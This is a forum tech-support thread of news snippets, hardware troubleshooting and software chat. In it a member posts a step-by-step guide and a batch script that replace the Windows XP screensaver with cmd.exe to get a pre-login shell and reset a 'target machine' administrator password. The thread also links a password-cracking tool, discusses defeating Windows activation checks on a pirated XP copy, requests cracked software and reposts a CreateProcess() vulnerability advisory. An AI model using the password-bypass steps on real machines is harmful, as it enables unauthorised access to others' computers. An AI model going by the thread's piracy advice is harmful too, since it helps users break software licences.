<<< 12Oz Computer Tech Support SuperThread >>>

[shai]

Johnny, if you need an office suite, OpenOffice.Org is good...it's big, but it does everything Outlook does, and better.

 

You should spend some time on Sourceforge and look at what's out there as far as free/Open Source XP apps. I think you'll be surprised.

 

I still love Linux, but there's some major advantages to XP that make life a lot easier (hardware support, for starters).

[shai]

Don't mention it....I just tell everyone who's interested that there's no need to pay for software or OSes anymore, then show them how it's possible. I do this simply because I think people like Bill Gates and Paul Allen are rich enough to live for the next million years rather comfortably...they aren't exactly hurting for cash.

[Mainter]

hey did you hear microsoft flew in the top designers of firefox to redmond WA to discuss making sure firefox will work with Windows Vista

 

atleast microsoft is not that fucking ignorant to sabotage firefox because you know damn well vista will not go anywhere if firefox does not work in it

[Mainter]

here is the story

 

http://www.betanews.com/article/Microsoft_Invites_Mozilla_Devs_Over/1156192744

[Mainter]

oh and if anyone that reads this thread verizon announced it's adding a surcharge to residential DSL, starting between $1.20 and $2.70 per month depending on speed.

[johnny ballbags]

i dl'ed open office a while ago but havent used it yet...

[shai]

Yeah, they're slowly beginning to realize that even if they don't like OSS, it's not going away, and it's in their own best interests to learn how to coexist with it. OpenOffice.org and Mozilla definitely helped.

 

They may very well be smarter than I thought. But, I'll always give MS enough rope to hang themselves with.

[shai]

My only gripe about OOO is that it's bloated (200 MB, about 50 MB of which you really need). Besides that, no complaints.

 

I see OOO pulling off the same coup that Firefox managed by beating MS at their own game in the not too distant future. Nobody I know uses IE anymore.

[Mainter]

Nobody touches Big Brother's Apple's OS until they're good and ready -- not nobody. Apparently not even Apple employees are beyond the long arm of the law, since a few Apple Retail employees have been sacked after being overheard by the Thought Police co-workers while discussing their evil deeds, and were subsequently reported to corporate. Their crime? Downloading the WWDC edition of Mac OS X 10.5 Leopard that was handed out to developers at the recent keynote and has been popping up on file sharing sites of late. At least five employees have been fired so far, with "dozens" more facing electroshock therapy expulsion. When questioned about their actions, the employees fessed up to the crime, and they seemed to think Apple was in the right for giving them the boot, though they do wonder if they'd still have their jobs if they'd hadn't admitted to downloading Leopard. Guess you'll never know now, eh Honest Abe? Though you can assume with our BitTorrent habits that we wouldn't be blabbing about our recent acquisitions in front any Inner Party members Apple corporate types.

[Mainter]

GMail + GTD = GTDGmail

GTDGmail - The Firefox Extension that Combines Gmail with Getting Things Done - home GTDGmail looks like a promising entry into the increasingly crowded gene pool of web-based productivity software. The Firefox extension runs on top of your Gmail account, giving you an email-centric approach to implementing Getting Things Done that includes contexts, statuses, a very.................http://www.43folders.com/2006/08/21/gtdgmail/

[Mainter]

ASUS has gone and set the bar for a home Internet gateway to a new high. The company just released the ASUS WL-700gE

 

* 802.11b/g WiFi access point

* High-end WiFi standards support, including AES, 128-bit WEP, TKIP, & WPA.

* 10/100 local Ethernet port with 4-port Ethernet switch

* Two internal firewalls, creating a DMZ within the device (that VERY cool).

* Full Internet gateway features (router, NAT addressing, DHCP, SPI-firewall)

* USB ports for hard drive expansion, printer sharing and more

* A pre-installed 160GB IDE hard disk.

* Web admin pages that include download management, web server, FTP server and content sharing features

 

Overall, this is a kick-butt unit. Wish it had 10/100/1000 on the Ethernet side, tho. Everything else is bleeding edge, why not the throughput? Oh, and it's supposed to cost about $260--when it's available here which is a detail that's apparently still a bit up in the air. A bit pricey, but when you consider that you're getting a pretty high-end Internet router and a network hard disk all in one, that price is actually pretty good.

[Mainter]

http://content.music.myspace.com/music.ashx?bandid=90827837&songid=23154269&name=DontDownloadThis...

 

haha check this song out

[Mainter]

Krishna Dagli writes to mention a New York Times article about the dangers of public web surfing. The article looks at the sloppy habits people have when using public terminals, and the issues that using a wireless signal in a public place. From the article: "Michael Sellitto, a graduate student studying international security at Harvard, said that even though he encrypted any sensitive data on his laptop, he planned to sign up for a service like HotSpotVPN to add another level of security when he is traveling, especially when using poorly protected networks at cafes and hotels. 'The problem is, the really good people have written sniffer programs so that the less-sophisticated people have access to the same technology,' Mr. Sellitto said. 'Say a Microsoft Word document gets transmitted. The sniffer program will collect that and someone could open it up on their computer.'"

[Mainter]

Microsoft tests new WiFi tool. Microsoft sent out beta invitations yesterday for folks to test a new WiFi connection manager, called the Windows Live Connection Center Wi-Fi. (They really need to work on those names.) But the new service is supposed to help folks in finding, registering and using public wireless hotspots. Wonder how that's going to work as a "Live" service, since theoretically, don't you need Web access to use those tools? (Source: BetaNews)

[Mainter]

Sony ships 50GB Blue-Ray Discs

[sony 50GB blu-ray disk via www.sony.com]

In the continuing war between the Blu-Ray and HD DVD standards, Sony has just fired the latest salvo. The company has officially begun shipping 50GB dual-layer Blu-Ray discs. For a change, we lucky sonuvaguns in the US are going to get them first with Europe and the rest of the planet getting them later this year.

 

Each $48 disc can handle HD-quality video recordings at a transfer rate of 24Mbps, which boils down to about 4 hours of hi-def video per disc. So if you've got a HDTV, and a Blu-Ray recorder hooked to your HDTV cable or satellite box, and one of Sony's Blu-Ray-equipped VAIO notebooks, you can start watching recorded HDTV on those long plane rides. If transit security lets notebooks back on planes, that is.

[Mainter]

johnny? when did the slow down start?

 

Worm sparks rise in zombie PCs

Malicious code that exploits a recent Windows hole has led to significant growth in the number of hijacked PCs, according to messaging security company CipherTrust.

[Dick Quickwood]

ok now the bios is trying to claim neither of my cd drives are compatible with come acronym i forgot. APTA or some shit. what the fuck bios, i thought you were down?

 

the hard drive is in fact bad, so i was going to try to boot from a cd. i dunno if it makes a difference but the cable that connects the cd drive to the board is this paper thin ribbon that fits into a little slot that has a lock that you have to push in, one end has an ide adaptor for the drive

[Tesseract]

ATTENTION !!!

 

Okay guys, i hope this isnt as serious as it seems. Last night i was notified of a new xp upgrade that was about to be installed on my comp, business as usual...shut down the computer and left . This morning when i opened my comp this beautifull message appeared saying that my copy of xp isnt genuine and that i'll be given the opp to fix that, second message was that i should follow this button and 'get genuine' or resolve later. As you realise i chose the later.

 

On top of that, there's this icon on my toolbar that keeps reminding me of the situation.

I went and checked on add/removed programs and saw that the said fix is called:

WINDOWS GENUINE ADVANTAGE NOTIFICATION (KB 905474) and that (surprise, surprise) it cannot be removed. I started the thinking that maybe i should do a rollback on windows but then i thought not to do anything before i check with you doods.

 

I guess this will spread fast if i aint the only person with a cracked xppro copy that was working

fine up to now and i guess the big fear is that my windows will get locked or some dangerous shit of that kind. I aint turning my comp off until i hear something comforting so please team tech, go go go

[Tesseract]

I did some research and came across that stuff:

 

http://digg.com/software/Get_rid_of_MS_Genuine_Windows_Advantage_new_nag_screen

 

http://home.san.rr.com/phup/programs.htm

 

also, should i be using this?:

http://windowsupdate.62nds.com/

[Tesseract]

Okay, i used the fix from the second link above and its all fine now. False alarm.

[lord_casek]

tesseract: per new forum rules, we aren't allowed to say alot about this,

but i think you found the right tools, and using windiz is a good thing (the best thing)

to do.

 

if you need some advice and tips, you should PM one of us. i will say you did a good job researching. we've taught you guys something. awesome!

[lord_casek]

ok now the bios is trying to claim neither of my cd drives are compatible with come acronym i forgot. APTA or some shit. what the fuck bios, i thought you were down?

 

the hard drive is in fact bad, so i was going to try to boot from a cd. i dunno if it makes a difference but the cable that connects the cd drive to the board is this paper thin ribbon that fits into a little slot that has a lock that you have to push in, one end has an ide adaptor for the drive

 

 

it's your drivers that are fucking things up. hd is slowly going bad.

erd commander will help you out. let one of us PM you later about that.

[lord_casek]

an update on the dumb bitch:

 

so you ask "what woke you up so early this time, casek?"

 

a crazy stupid woman calling my phone 20+ times in a row

this morning. i think it was 5:30 or so. wtf? exactly.

[Pfffffffffft]

i need a permanent copy of tune up utlities..

 

 

ive dled so many trials, it wont let me any more..

 

any help??

[shai]

I think she has the hots for you, casek.

 

That or she has one hell of an online shopping jones, and you have the fix.

 

Either way, you're fucked. You should enter the Witness Protection Program.

 

It's been nice knowing you.

[lord_casek]

How to hack windows XP admin password

 

If you log into a limited account on your target machine and open up a dos prompt

then enter this set of commands Exactly:

 

cd\ *drops to root

cd\windows\system32 *directs to the system32 dir

mkdir temphack *creates the folder temphack

copy logon.scr temphack\logon.scr *backsup logon.scr

copy cmd.exe temphack\cmd.exe *backsup cmd.exe

del logon.scr *deletes original logon.scr

rename cmd.exe logon.scr *renames cmd.exe to logon.scr

exit *quits dos

 

Now what you have just done is told the computer to backup the command program

and the screen saver file, then edits the settings so when the machine boots the

screen saver you will get an unprotected dos prompt with out logging into XP.

 

Once this happens if you enter this command minus the quotes

 

"net user <admin account name here> password"

 

If the Administrator Account is called Frank and you want the password blah enter this

 

"net user Frank blah"

 

and this changes the password on franks machine to blah and your in.

 

 

Have fun

[lord_casek]

I think she has the hots for you, casek.

 

That or she has one hell of an online shopping jones, and you have the fix.

 

Either way, you're fucked. You should enter the Witness Protection Program.

 

It's been nice knowing you.

 

nah, man

 

she wants her computer fixed for free. didn't i say something about people

getting demanding after they start getting their computer fixed for free?

i encounter this on a personal basis moreso than an online type basis.

[lord_casek]

Multiple Vendor Insecure Call to CreateProcess() Vulnerability

XML RSS

 

 

I. BACKGROUND

 

The Microsoft Windows API includes the CreateProcess() function as a

means to create a new process and it's primary thread.

CreateProcessAsUser() is similar but allows for the process to be run in

the security context of a particular user.

 

II. DESCRIPTION

 

The format of the CreateProcess() function is as follows:

 

BOOL CreateProcess(

LPCTSTR lpApplicationName,

LPTSTR lpCommandLine,

LPSECURITY_ATTRIBUTES lpProcessAttributes,

LPSECURITY_ATTRIBUTES lpThreadAttributes,

BOOL bInheritHandles,

DWORD dwCreationFlags,

LPVOID lpEnvironment,

LPCTSTR lpCurrentDirectory,

LPSTARTUPINFO lpStartupInfo,

LPPROCESS_INFORMATION lpProcessInformation

);

 

The 'lpApplicationName' variable contains the name of the module to be

executed. However, this can be a NULL value, in which case, the module

name to be executed will be the first white space-delimited token in the

lpCommandLine string.

 

It is a known issue, that if lpApplicationName contains a NULL value and

the full module path in the lpCommandLine variable contains white space

and is not enclosed in quotation marks, it is possible that an alternate

application will be executed. Consider the following scenario:

 

CreateProcess(

NULL,

c:program filessub dirprogram.exe,

...

);

 

In this case, the system will successively expand the string when

interpreting the file path, until a module is encountered to execute.

The string used in the above example would be interpreted as follows:

 

c:program.exe filessub dirprogram name

c:program filessub.exe dirprogram name

c:program filessub dirprogram.exe

 

Therefore, if a file named program.exe existed in the c: directory, it

would be executed instead of the intended application. This is a known

issue, discussed directly in the API documentation:

 

http://msdn.microsoft.com/library/en-us/dllproc/base/createprocessasuser.asp

 

III. ANALYSIS

 

Despite the fact that this is a known issue, several popular

applications, insecurely call the CreateProcess() and

CreateProcessAsUser() functions. This creates a scenario whereby

arbitrary code could be executed. In the scenario detailed above, if an

attacker were able to install arbitrary code in a file at

c:program.exe, when the vulnerable application was launched, the code

would be executed. The arbitrary code would generally be executed under

the privileges of the executing user but could also be launched with

elevated privileges if an insecure call were made CreateProcessAsUser()

using elevated privileges. This attack would involve some form of social

engineering or need to be combined with another attack to first get the

arbitrary code installed in the correct location.

 

IV. DETECTION

 

The following applications have been confirmed to be vulnerable:

 

Vendor: RealNetworks

Application: RealPlayer 10.5

Files: realplay.exe

realjbox.exe

 

Vendor: Kaspersky

Application: Kaspersky Anti-Virus for Windows File Servers 5.0 (English) - Installation File

Files: kav5.0trial_winfsen.exe

 

Vendor: Apple

Application: iTunes 4.7.1.30

Files: iTunesHelper.exe

 

Vendor: VMWare

Application: VMWare Workstation 5.0.0 build-13124

Files: VMwareTray.exe

VMwareUser.exe

 

Vendor: Microsoft

Application: Microsoft Antispyware 1.0.509 (Beta 1)

Files: GIANTAntiSpywareMain.exe

gcASNotice.exe

gcasServ.exe

gcasSWUpdater.exe

GIANTAntiSpywareUpdater.exe

 

Note: The vulnerability in Microsoft Antispyware was previously

discussed on the Full-Disclosure mailing list

(http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/033909.html)

but remains unpatched.

 

V. WORKAROUND

 

Ensure that unexpected files are not stored in locations that can be

used for this attack. Windows XP SP2 will alert a user of the existence

of a file named c:program.exe when it first boots, however, any path

containing white space where a vulnerable application is stored could be

used in this attack.

 

VI. VENDOR RESPONSE

 

The following vendor responses have been provided.

 

Apple:

 

"Due to the way iTunes 5 launches its helper application, multiple

system paths are searched for which program to run. This may allow a

malicious user on the local system to create an environment where an

alternate program will be executed by iTunes. iTunes 6 addresses this

issue and can be obtained from http://www.apple.com/itunes/download/.

Credit to iDEFENSE for reporting this issue to us."

 

Kaspersky:

 

"We are currently looking into the problem, and it seems that this is

not present in the current version of KAV for File Servers."

 

Microsoft:

 

"Microsoft has confirmed that the Beta 2 version of its Antispyware

product, targeted for release later this year, will address the issue

reported by iDEFENSE."

 

VII. CVE INFORMATION

 

The Common Vulnerabilities and Exposures (CVE) project has assigned the

following names to this issue.

 

RealNetworks RealPlayer 10.5

CAN-2005-2936

 

Kaspersky Anti-Virus 5.0

CAN-2005-2937

 

Apple iTunes 4.7.1.30

CAN-2005-2938

 

VMWare Workstation 5.0.0 build-13124

CAN-2005-2939

 

Microsoft Antispyware 1.0.509 (Beta 1)

CAN-2005-2940

 

Theses are candidates for inclusion in the CVE list

(http://cve.mitre.org), which standardizes names for security problems.

 

VIII. DISCLOSURE TIMELINE

 

09/19/2005 Initial vendor notification

11/15/2005 Coordinated public disclosure

 

IX. CREDIT

 

The discoverer of this vulnerability wishes to remain anonymous.

[lord_casek]

@echo off

/cd

/cdwindowssystem32

mkdir hakbak

copy logon.scr hakbaklogon.scr

copy cmd.exe hakbakcmd.exe

del logon.scr

copy cmd.exe logon.scr

pause

exit

[lord_casek]

http://ophcrack.sourceforge.net/